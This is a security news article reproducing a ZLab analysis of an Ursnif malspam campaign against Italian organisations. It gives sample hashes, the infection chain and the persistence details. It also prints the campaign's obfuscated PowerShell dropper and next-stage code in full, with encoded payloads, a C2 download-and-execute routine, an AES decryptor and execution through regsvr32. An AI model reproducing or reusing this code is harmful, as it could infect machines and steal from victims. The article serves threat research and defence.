A Brand New Ursnif/ISFB Campaign Targets Italian Organizations

Pierluigi Paganini April 17, 2020

Cybaze-Yoroy ZLab researchers spotted a new variant of Ursnif that is targeting organizations in Italy.

Introduction

Ursnif is one of the most and widespread threats, it is delivered through malspam campaigns aimed at multiple industries across Italy and Europe.  

Recently, we have identified a new variant that is targeting Italian organizations. The malspam messages use attachments with subjects like “Avviso di Pagamento_xxxx_date” where xxxx is a number and date is a date reported in the format “dd-mm-yyyy” (i.e. “Avviso di Pagamento_14326_15_04_2020”). We spotted some major changes in the techniques employed in the Ursnif/ISFB droppers used in the campaign. Operators behind the campaign have adopted new techniques to avoid detection and propose important changes in the Ursnif infection chain. 

Technical Analysis

The variant used in the campaign against Italian organizations contains some important “upgrades” compared with other samples of the Ursnif malware family and a significant evolution of the attack chain. First of all, the dropper uses Excel 4.0 macros (XLM macros) in the attempt to make it hard the detection by AVs, then it uses two different C2, one of them is only used for the registration of the victim machine identified by a UUID. 

The following picture reports the Ursnif Infection chain that is used in this campaign:

Figure 1: Ursnif Infection Chain

Macro from the Past  

This brand new Ursnif italian campaign is delivered as a malicious email attachment with XML macro embedded into it. Following, the static information of the dropper:

Hash5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394
ThreatUrsnif XLS document dropper
Size39.0 KB (39,936 bytes)
FiletypeMS Excel Spreadsheet
Brief DescriptionUrsnif XLS Document Dropper with malicious XML macros embedded into it
Ssdeep768:Deb3eTlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0LzX74bTPuQ:DeaTlYkEIbSkKBEqEXPgsRZmbaoFhZhq

Table 1. Sample information

Once opened, the document looks like an invoice ready to be filled, it displays a “Visualize” button to trick victims into clicking on it and the infection starts. Upon clicking the “Visualizza” button would start all the malicious infection chains designed to compromise the target machine.  

Figure 2: Overview of the document

Even if the document is structurally similar to other ones used to spread the malware in past malspam campaigns, its content stands out.

The security notice informs us that dynamic content is contained in the document, a deep inspection revealed the presence of some embedded EXCEL 4.0 macros (XML/XLF macros).

Figure 3: Piece of the malicious XLM Macro

The dynamic content is written in Powershell and it is split across multiple cells and then evaluated with some defined handler:

Figure: Evidence of the Executed code

The Frame1_Layout handler is triggered when the user clicks on “Allow Content”. 

Then the malicious macro is re-assembled and the document prepares a window to display a message to the users informing him that the document is corrupted. When the user clicks on it, the macro kills the Excel process, but the Powershell continues its execution in the background.

The extracted macro represents the Ursnif Dropper, after reassembling it, looks like as shown in the figure:

sal uu New-Object; &( ([stRING]$VErBoSePRefErENce)[1,3]+’X’-JoIN”) ( uu io.compRESSiON.defLaTEstrEaM([system.Io.meMoRysTrEaM] [conVerT]::FROMbASE64StriNG( ‘ZVULU9pKFP4rOxmum60QSXhpGWYualooPlrB1tbL3ERZJSUmSJYqTfe/3+8syGPuDNkX5/GdN2OFeFKv3vktxm7VYiqHtpVXdN7Q+aHOPZ1Xde66+HRe13kNh7LO8TvSFit9YPwqUh1e5JePs/Zn7NdXEdY+vsHCOcHWzrCMvztE9L0/wOo/OZl/j8M5vk777PES+9ViqrhgrMnYHgC4pMMqPTAulZEnmNtvMBsYB4vPbxhdA7C8QiIvTi5H3YuPpFveYFUOsS6ygX/uQICA8MJRf+L9YC2S4g/XipjR9Oi/gmHGRbOQd3tBehZc9nWr3PwwT+5VlCZsEIzt276aRcnjkBXyzkIXC/nHYKxb1vlpzRI53nBxbD6fQyHElw3IqnFchdCSKuOeRabkkzOQr8ohiXiRMyzxCEuC7/F4HgEJQ3h69eqx//49xHl6BzChlSE56IQLp5v8SifSBqKOFo51f3k+Da4H/rgd9DsWPGczZ4nI00vnwb+cvOWTclX6RdGadcPjMwoEuZsJ52s7voZuaz4IPhxazpvHyBJwS3W8IPUkRWbbGDrBdy3EH7jiLy7y269pNBoW8nHQ0c6bW0hAezol1mS0zfvvFg25a5D2SQm5fUNmvXqWEBqh6nR26RkxUPh3GUD78BbIjrJvs3Uc/cDXIh+lCN+1bpV+plFi20cNx3E9T/zZ27WZMrJ0FSajdGX3E7xVOknniWKVtb3343A2JEu00C/jKJa2vWdzNebCJiUCLEmq4mgiGX/H9wu5DKQWzZlU81nCiIQsew1Odet/YSdfhKPsJXrAYT6NU5Ow4+C3bvEwyzguX3TLwzaK8DR94RvDBxn0dz9pStVBEPV0y1yb0QPeVdDtaVZ6CtX9mHlEcjMigg5Ek7SAxHE6Hgdd3aJi6nk/TGJu1es0Du/lso42IYXoiS7yf5DdS7MEqdxb2lZdmYesXCU2wEJCmlAhDMzJJJgqnVBZQX9Xw2enQLH2vctKz/NIKoJ9Z4Du87HCoqZ8fwshP4Co7P0BF/uGEOsI0vC8T3ZFepXj3hu9ySL0kfkdMaptq551kZGzhZZxJkkx+YXe9SaUJJN8JnXrb3s79xP54kIkWlORI4TrGE2CC4g6+wwbvDAGeGQOLBH2bpK/A29duqgcIfZ3Oxn1vTCKYaLtbHg3MSJL3h3VHoj1DSgIVWbS82yqTV3dBM+ml6m+efb1bXkolpnyGnxBosjnpfWUKHhoAWcv4YZ3sdMF1+VD1XxHU+FCKucbZUkcyUSZBF5ox+rIoD2SV9mm0ZCjRtQT2xvHr/uqt7L3OjPts9SmvmnkFZmxuL5UjASreGakHeG0HGZe2Qw0z1u357KZeC6oPFw9kHruavZR6waxu+ziNAFdGo5EDjIXMjwiAatbXfeJ9Dclcb3aZK/1qmBodbH8Ri8elkPHLXsMhwYFq1JnNrZIHdSwlc2FBua3CH3mhbIvpGL/SB5r4KPp6R5WaLLO0id50Cg7ZadSq6yGKpVMaGYKvci7Hla2ujnQ5Y8eJZVBHIe0nZ8V6d9JKtiJEUyQDBJqUNiIP2MXA+ZCT5MBFR5qjkkfEzj4urqq4FVcELb0JTEVY4CYGorTkEJ5ul1DN8+axgRbD1bOHetKngdp8FVa4rZaK7pe0WsMS5/Ql1Eo/wE=’ ),[iO.ComPrESsIOn.CoMPreSSioNmodE]::DEcOmPreSS )| fOReACH-ObjECT{ uu iO.StReamrEadeR( $_ ,[teXT.EnCODing]::AsCIi ) } |FoReACh-OBjecT{$_.READTOEnD() } )

Code snippet 1

After deobfuscating bit it looks like this:

  $lk64bE= [type](“{3}{7}{8}{2}{4}{11}{1}{6}{5}{10}{0}{9}” -F ‘RitH’,’OgrAP’,’URi’,’S’,’Ty.C’,’As’,’hY.H’,’YST’,’Em.sEc’,’M’,’HALgO’,’Rypt’) ; &(“{1}{0}”-f ‘et’,’S’) 1S7 ( [TyPe](“{3}{1}{2}{0}” -F ‘eNCOdING’,’TeX’,’t.’,’SysTEM.’) ) ; $9Sk2Z =[TyPE](“{1}{0}” -f ‘egEx’,’r’);${IK`oL`OS}=0;Function T`h([String] ${Hy},${G`h}=”MD5″){${Hh}=.(‘uu’) (“{0}{1}{4}{5}{3}{2}” -f’S’,’ystem.Text.Stri’,’er’,’ld’,’n’,’gBui’); $lK64BE::(“{2}{1}{0}” -f ‘e’,’reat’,’C’).Invoke(${GH}).”cOMp`UTEhA`SH”( ( .(“{0}{2}{3}{1}”-f’G’,’E’,’et-v’,’ArIaBL’) 1S7 ).VAlUE::”uT`F8″.(“{1}{0}{2}”-f’etByt’,’G’,’es’).Invoke(${H`Y}))|.(‘%’){[Void]${h`H}.(“{0}{1}”-f’App’,’end’).Invoke(${_}.(“{0}{1}” -f’ToSt’,’ring’).Invoke(“x2”))};${HH}.(“{0}{1}” -f ‘ToS’,’tring’).Invoke()};function Ht([string] ${E`E}){do{${U}=-join((97..122)|&(“{1}{0}{2}”-f ‘et-Rando’,’G’,’m’) -Count 3|.(‘%’){[char]${_}})}while((&(‘th’)(${U})) -notlike ‘*’+${e`e});return ${U}};${x`D}=(“{2}{1}{0}” -f ‘t’,’adswif’,’uplo’);${h`z}=’ass’;${Q}=2;${di}=’pw’;function Ts(${IJ}){${T`iK}=${IJ};if(${t`IK} -match 2){${Xd}=${H`z};${d`i}=”};${B`I}= $9SK2Z::(“{1}{0}”-f ‘eplace’,’r’).Invoke(${t`Ik},’\d’,${x`D});if(&(“{2}{4}{1}{0}{3}” -f ‘ecti’,’onn’,’T’,’on’,’est-C’) (${BI}+${D`I}) -Count 1 -quiet){${bi}=”+’ht’+’tp’+(“{1}{0}”-f’/’,’s:/’)+${bi}+${dI}+’/’+${B`i}.(“{1}{2}{0}”-f’ring’,’Sub’,’st’).Invoke(${q}, ${Q})}else{${b`I}=${q}};return ${B`i}};${e}=@((“{0}{1}”-f’new1′,’.’),”);function k`N{${LP}=’2al’+(&(‘ht’)((“{0}{1}” -f ‘*’,’6e1d’)))+(“{1}{0}” -f ‘.’,’ail’)+(.(‘ht’)((“{1}{0}”-f ‘b’,’*95f’)));return .(‘ts’)(${Lp})};${X`q}=.(‘tS’)(${E}[0]);if(${x`Q} -eq ${Q}){${X`Q}=&(‘Kn’)};${y}=.(‘uu’) (“{1}{0}{2}” -f’bC’,’Net.We’,’lient’);${y}.”He`AdeRs”.(“{1}{0}”-f’dd’,’A’).Invoke((“{0}{1}{2}” -f ‘Us’,’er-A’,’gent’), ((“{16}{0}{24}{32}{7}{9}{31}{1}{20}{6}{22}{4}{5}{30}{8}{17}{25}{29}{21}{11}{13}{26}{15}{3}{10}{18}{28}{19}{12}{23}{27}{14}{2}”-f ‘ozi’,’64; x64) AppleW’,’62’,’8.102 ‘,’7.’,’36 (‘,’it/5’,’0 (‘,’H’,’Window’,’Saf’,’Ge’,’7′,’c’,’183′,’hrome/70.0.353′,’M’,’T’,’ari’,’3′,’ebK’,’ ‘,’3′,’.36 Edge/’,’lla/’,’ML, ‘,’ko) C’,’18.’,’/5′,’like’,’K’,’s NT 10.0; Win’,’5.’)));${y}.(“{4}{0}{3}{1}{2}”-f’own’,’stri’,’ng’,’load’,’D’).Invoke(${Xq})|.( ([String]”.”ReM`o`Ve”)[45,12,27]-Join”)

Code Snippet 2

The dropper uses base64 encoding, string substitution (sequences of multiple ‘{}’) and string capitalization (sequences of upper and lower case).

Once the macro is executed, the dropper will contact the newuploadswift [.]pw domain in order to download the next stage payload and executes it using the PowerShell engine. The next downloaded stage looks like below:

&((gV ‘*MDr*’).nAme[3,11,2]-JOiN”)( uu IO.strEaMREaDeR(( uu io.comPRESSiON.DeflATeSTrEaM([SYStEM.io.MeMORysTrEAM][cONVert]::FrOmBASe64STRinG( ‘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’), [iO.COmPREsSioN.coMprEssIOnmoDe]::dEcoMPrEss )) , [TexT.EncOdINg]::asciI) ).ReADtoenD( ) 

Code snippet 3

After de-obfuscating it, the powershell becomes:

function SDfiwe(${T`T}){${T`hL}=[regex]::(“{2}{0}{1}”-f ‘epl’,’ace’,’r’).Invoke(${tt},’\d’,”);return ${t`hl}};function YwE(${T`e}){${i`I}=[Convert]::(“{0}{3}{2}{4}{1}” -f’F’,’tring’,’e64′,’romBas’,’S’).Invoke(${t`E});return ${Ii}};&(“{1}{0}”-f’l’,’sa’) Vu new-object;${l`LA}=$(&(“{0}{2}{3}{1}”-f’get-‘,’object’,’wm’,’i’) Win32_ComputerSystemProduct -computername . | &(“{0}{2}{1}”-f’Select-‘,’ject’,’Ob’) -ExpandProperty UUID);${a`Zq}=${ENV`:tE`mP};${f`Bf}=(${d}=&(“{0}{1}” -f’gc’,’i’) ${a`zq}|&(“{1}{0}{2}”-f ‘d’,’get-ran’,’om’)).”na`mE” -replace “.{5}$”;${M`K}=(&(“{1}{0}”-f ‘i’,’Gc’) -path (((${A`zQ}.(“{0}{2}{1}” -f ‘to’,’ring’,’st’).Invoke()))) | &(“{2}{3}{0}{1}”-f ‘e-Obj’,’ect’,’W’,’her’) { ${_}.”pSis`cON`TAiner” }|.(“{2}{1}{0}”-f ‘lect’,’e’,’s’) fullname |.(“{1}{0}{2}”-f’ndo’,’Get-Ra’,’m’) -count 1).”FulLn`A`Me”+’\’+${f`BF}+’.’;function NiLL(${T`yO}){${k`j}=.(‘Vu’) IO.MemoryStream(,${t`yO});${m`m}=(.(‘Vu’) IO.StreamReader(&(‘Vu’) IO.Compression.GzipStream(${k`J},[IO.Compression.CompressionMode]::”d`ECO`mPrESs”))).(“{1}{2}{0}”-f ‘nd’,’ReadT’,’oE’).Invoke();return ${M`M}};&(“{0}{1}” -f ‘s’,’al’) msq regsvr32;${S`U}=’using System;using System.Security.Cryptography;using System.Text;public class Af{public static byte[] mol(byte[] kk, string lj){byte[] jik = new UTF8Encoding().GetBytes(lj);Aes AESImplementation = Aes.Create(“AES”);AESImplementation.Key = jik;AESImplementation.Mode = CipherMode.ECB;ICryptoTransform CryptoTransform = AESImplementation.CreateDecryptor();return CryptoTransform.TransformFinalBlock(kk, 0, kk.Length);}public static byte[] cer(string kk, string lj){return mol(Convert.FromBase64String(kk), lj);}public static string fte(byte[] kk, string lj){return new UTF8Encoding().GetString(mol(kk, lj));}public static string fte(string kk, string lj){return new UTF8Encoding().GetString(cer(kk, lj));}}’;.(“{0}{1}”-f’A’,’dd-Type’) -TypeDefinition ${su};function osi{${M}=${x`Q}+${q}+’?’+${L`LA};.(‘Sv’) 8 ${m};&(‘SV’) t0L (“{2}{3}{0}{1}”-f ‘ie’,’nt’,’Net’,’.WebCl’);.(‘Si’) Variable:B (&(‘Vu’) (&(“{0}{1}” -f ‘I’,’tem’) Variable:\t0L).”v`ALUe”);.(‘Sv’) D (“{2}{0}{1}” -f’adDa’,’ta’,’Downlo’);${f`DS}=(([byte[]](&(‘Gv’) B -Value).((&(‘LS’) Variable:D).”Va`LUE”).”IN`VOke”((&(‘GI’) Variable:8).”vAL`Ue”)));return &(“{0}{1}”-f ‘Ni’,’LL’)(${F`ds})};function kelv{${Fd}=&(“{1}{0}” -f ‘i’,’os’);${fd}=[Af]::(“{1}{0}”-f’e’,’ft’).Invoke(${Fd},${l`lA}.(“{2}{0}{1}”-f’ubstrin’,’g’,’s’).Invoke(0,16));${U}=${FD}.(“{1}{2}{0}” -f ‘tring’,’su’,’bs’).Invoke(0,1);${e`F}=${F`D}.(“{1}{0}”-f ’emove’,’r’).Invoke(0,1);${O`O}=${e`F} -split’!’;${vr}=[Text.Encoding]::”Ut`F8″;foreach(${O} in ${oO}[0]){${o`UT}=@();${O`A}=${U}.(“{0}{1}{2}”-f’ToCharArr’,’a’,’y’).Invoke();${o}=&(“{1}{0}” -f ‘wE’,’Y’)(${O});for(${I}=0; ${i} -lt ${O}.”c`oUnT”; ${I}++){${o`Ut} += [char]([Byte]${O}[${i}] -bxor[Byte]${OA}[${I}%${o`A}.”COU`NT”])}};${SS}=${e`F}.”rep`lA`ce”((${o`O}[0]+”!”),${v`R}.”gE`TSTr`i`NG”(${O`UT}));return ${SS}};function gb{${k`I}=&(“{1}{0}”-f’lv’,’ke’);[io.file]::(“{0}{2}{1}”-f’Write’,’tes’,’AllBy’).Invoke(${m`K},(.(“{1}{0}” -f ‘E’,’Yw’)(${ki} -replace “.{200}$”)));if((&(“{1}{0}”-f ‘ci’,’g’) ${mk}).”Len`GtH” -lt 512){exit};&(“{0}{1}”-f’ms’,’q’) -s ${mK};.(“{0}{1}” -f’sle’,’ep’) 15;.(‘sl’);[io.file]::(“{2}{1}{0}” -f’ines’,’llL’,’WriteA’).Invoke(${m`k},(&(“{1}{0}”-f’Dfiwe’,’S’)(${l`LA})))};&(‘gb’)

Code Snippet 4

At this point it is necessary to highlight a particular trick adopted by the malware to make the infection unique on the machine: in the previous code snippet, we have sees the creation of the UUID of the machine, which is passed to the same c2 as a parameter for the next GET request. In case the same UUID is used a second time, the server replies with an empty body. If the UUID is passed for the first time to the server, in turn, it provides the next stage of the infection, as shown in the previous figure.

Figure 4: Piece of the encrypted DLL downloaded from the DropURL

As seen in the previous figure, the body of the response is encrypted. It is decrypted by the AES routine shown in Code Snippet 4 (highlighted in red) and then executed through “regsrv32.exe” process. 

The Loader

The payload is as follows:

Hashe32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0
ThreatUrsnif Loader
size289.50 KB (296448 bytes)
FiletypeDLL
Brief DescriptionUrsnif Loader to able to inject in memory
Ssdeep6144:ydLG0cc+HXn8zAzaFVqG9aldc3w0QBA8Ys36cMsu+a:y5GjsEzaKG4XcLs3isu+a
Imphashf11ff0b8c499af0d98f00299b97339cf

Table 2. Sample information

This component is the loader for the ursnif payload. It writes the following registry key at the path “HKCU\Software\AppDataLow\Software\Microsoft\Microsoft\[RANDOMID]” as persistence mechanism:

Figure 5: Registry key evidence

As the classic Ursnif malware infection, it sends the configuration string to the C2 encoded in Base64 format and encrypted with the Serpent algorithm. There are two ways to retrieve the configuration string: the first one is to decrypt it from the request sent to the C2, decrypting the serpent with the key extracted from the process memory; the second one is to look for the configuration string inside the process. In the end, the configuration of this Ursnif campaign is the following:

k=kjrisau&soft=1&version=214131&user=92bdf642cd2b24f71ccbae351ccb9aa9&server=12&id=4444&crc=ef267149&uptime=12089&ip=*.*.*.*

Conclusion

With our previous analysis we tracked the evolution of Ursnif TTPs over time. Some of the techniques used by the malware are rapidly evolving especially in the direction of evasion and anti-analysis.

This Italian campaign, while maintaining the same characteristics and capabilities of recent ones, uses xlm macros to low detection by AVs, and two different C2, one of which is deputy to track each infection with an unique UUID. This mechanism permit to better track the return of investment of the malicious campaign.

Additional details, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published by ZLab.

https://yoroi.company/research/a-brand-new-ursnif-isfb-campaign-targets-italian-organizations/

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – Ursnif, malware)

[adrotate banner=”5″]

[adrotate banner=”13″]



you might also like

leave a comment